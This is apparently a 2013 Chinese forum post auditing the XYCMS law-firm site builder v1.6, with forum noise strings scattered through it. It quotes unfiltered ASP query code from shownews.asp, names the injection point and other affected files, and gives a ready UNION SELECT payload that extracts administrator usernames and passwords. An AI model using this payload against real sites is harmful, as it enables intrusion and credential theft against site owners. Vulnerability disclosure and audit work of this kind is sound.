前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
2 T9 j7 O% N6 n5 k5 d0 a2 ~
: b0 f. X2 P/ q淫荡分割线
) t: {. }# P$ L/ x3 e--------------------------------------------------------
9 S! A& K: Y( P; {. U, g
4 f' Q0 M2 d; b/ h/ G) S审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
$ Y+ o0 z) V; q3 f源码地址:http://down.chinaz.com/soft/29233.htm, @4 p* w2 a% S( L
$ U4 W5 g: [6 A漏洞文件:shownews.asp
0 K3 U/ H( y! s! x1 `7 \漏洞代码:7-13行
; |$ e/ R9 I- M ! ?: P+ Q, y' W8 k
# h2 ~3 |* C+ b$ ?4 o7 r2 ?
<% - A6 Y( N2 l7 E" |9 A
id=request.QueryString("id")" |! k( t! [+ d* M
& d- v! O3 A/ |) s/ s$ n
set snews=server.createobject("adodb.recordset")
" t# L, H9 F4 ]3 z4 V" U6 Wexec="select * from [news] where id="&id/ G" @6 {+ D9 ~0 {% u
snews.open exec,conn,1,1
9 A9 ^8 A! p ^; ^; k# p' s%>
2 g% F7 Z: ?* W- F$ L3 ~: H " z/ h5 M3 O0 u' ], E
) U" H; t# [& G4 ]
什么过滤都没有 直造成注入
2 ]8 T8 f: Z# G1 L: _
4 [3 d5 e) N9 B2 p注入点:http://127.0.0.1:99/shownews.asp?id=xx
2 I# E2 @) O5 H# R$ D 7 `) U9 G) b9 }# S
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
0 I, X; I4 Y% p( y' e & i4 ]' W* F* B6 q
0 ]: U5 Z0 a/ e0 _. [4 N6 j* u
exp: union select 1,admin,password,4,5,7 from admin_user+ R# A% C9 b$ W
( k" U9 D5 S# A! p0 } o8 g |
发表于 2013-4-4 17:28:12
收藏
支持
反对